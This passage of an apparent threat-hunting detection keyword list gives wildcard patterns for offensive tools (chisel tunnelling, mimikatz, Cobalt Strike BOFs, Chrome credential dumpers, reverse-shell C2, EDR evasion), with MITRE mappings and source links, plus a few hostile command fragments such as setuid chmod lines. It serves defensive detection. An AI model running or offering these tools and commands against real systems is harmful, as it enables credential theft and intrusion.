-*Chimera-main.zip*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,1,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z
-*Chimera-master.zip*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z 
-*chioafkonnhbpajpengbalkececleldf*,greyware_tool_keyword,BullVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*chisel -*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel client -*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel client http*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel server -*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel.exe *,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*chisel.exe client*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - 
TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel.exe server*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel.jpillora.com*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel_1*_darwin_*.gz*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel_1*_linux_*.gz*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,0,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel_linux_amd64*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel_windows_amd64.exe*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chisel-master.zip*,offensive_tool_keyword,chisel,A fast TCP/UDP tunnel over HTTP,T1090 - T1090.003 - T1572 - T1572.001,TA0042 - TA0011,N/A,N/A,C2,https://github.com/jpillora/chisel,1,1,N/A,10,10,9891,1162,2023-10-01T20:54:43Z,2015-02-25T11:42:50Z
-*chknull.zip*,offensive_tool_keyword,ChkNull,Checks for Users with No passwords,T1078 - T1201,TA0007,N/A,N/A,Credential 
Access,https://github.com/nyxgeek/classic_hacking_tools,1,1,N/A,N/A,1,2,0,2023-04-16T02:15:42Z,2023-04-16T01:49:12Z
-*chmod +x dirty*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,0,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z
-*chmod 4777 /tmp/.scsi/dev/bin/gsh*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*chmod 666 /var/run/utmp~*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Defense Evasion,https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z
-*chmod 700 lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z
-*chmod 700 nscd crond*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON,1,0,N/A,N/A,1,0,1,2017-11-12T08:13:06Z,2017-11-12T08:10:08Z
-*chmod 755 lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - 
T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z
-*choco install * common.fireeye*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z
-*chocobo_root.c,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*chocolate.kirbi*,offensive_tool_keyword,mimikatz,mimikatz exploitation command,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z
-*Choosing DLL to hijack.*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z
-*chown root %s chmod 4755 %s %s*,offensive_tool_keyword,EQGR,Equation Group hack tool leaked by ShadowBrokers- file elgingamble,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Shell spawning,https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*chown root:root /tmp/.scsi/dev/bin/*,greyware_tool_keyword,tmpwatch,Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time,T1070.004 - T1059 - T1047,TA0007 - TA0002 - TA0040,N/A,N/A,N/A,https://linux.die.net/man/8/tmpwatch,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 
-*chrismaddalena/SharpCloud*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z
-*chrispetrou/HRShell*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z
-*chrome* --headless * --dump-dom http*,greyware_tool_keyword,chromium,Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers,T1553.002 - T1059.005 - T1071.001 - T1561,TA0002,N/A,N/A,Defense Evasion,https://redcanary.com/blog/intelligence-insights-june-2023/,1,0,N/A,4,5,N/A,N/A,N/A,N/A
-"*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*",greyware_tool_keyword,chromium,The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.,T1136.001 - T1176 - T1059.007,TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://www.mandiant.com/resources/blog/lnk-between-browsers,1,0,risk of false positives,7,10,N/A,N/A,N/A,N/A
-*chrome_creds.txt*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z
-*chromecertbeggar.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*chromecertbeggar2.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*ChromeDump.git*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z
-*chromedump.py*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z
-*ChromeDump-main.zip*,offensive_tool_keyword,chromedump,ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser,T1059.007 - T1114.001 - T1518.001 - T1552.002,TA0005 - TA0009 - TA0011,N/A,N/A,Credential Access,https://github.com/g4l4drim/ChromeDump,1,1,N/A,N/A,1,54,1,2023-06-30T09:07:59Z,2023-01-26T20:44:06Z
-*chromeKey.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 
- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z
-*chromeKey.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z
-*chromepass.exe*,offensive_tool_keyword,chromepass,ChromePass is a 
small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/chromepass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*chromepass.zip*,offensive_tool_keyword,chromepass,ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. 
or from a user profile stored on external drive.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/chromepass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*chromiumkeydump *,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,0,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*chromiumkeydump*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*ChromiumKeyDump.cna*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation 
tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*ChromiumKeyDump.cpp*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*ChromiumKeyDump.exe*,offensive_tool_keyword,bof-collection,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/crypt0p3g/bof-collection,1,1,N/A,N/A,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*Chudry/Xerror*,offensive_tool_keyword,Xerror,fully automated pentesting tool,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Chudry/Xerror,1,1,N/A,N/A,5,458,106,2022-12-08T04:33:03Z,2019-08-16T21:20:52Z -*chunlie.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*chvancooten/nimbuild*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*chvancooten/NimPlant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*CIMplant.exe *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & 
Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*CIMplant.sln*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*CIMplant-main*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*cirt-default-usernames.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*cirt-fuzzer*,offensive_tool_keyword,cirt-fuzzer,A simple TCP/UDP protocol fuzzer.,T1046 - T1065 - T1190 - T1219 - T1221 - T1497,TA0001 - TA0002 - TA0003 - TA0008 - TA0011,N/A,N/A,Sniffing & Spoofing,https://www.ecrimelabs.com/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cisco2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*cisco-phone-query.sh*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - 
TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,1,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*ckiahbcmlmkpfiijecbpflfahoimklke*,greyware_tool_keyword,Gom VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*clear_cmd,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*clear_command_history.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*ClearEventlog.vbs*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*Clearlogs*,signature_keyword,Antivirus Signature,Antivirus signature_keyword for hacktool clearing logs,N/A,N/A,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*,greyware_tool_keyword,powershell,Deletes contents of recycle bin,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*clem9669_wordlist_medium.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*clem9669_wordlist_small.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*-cli install github 
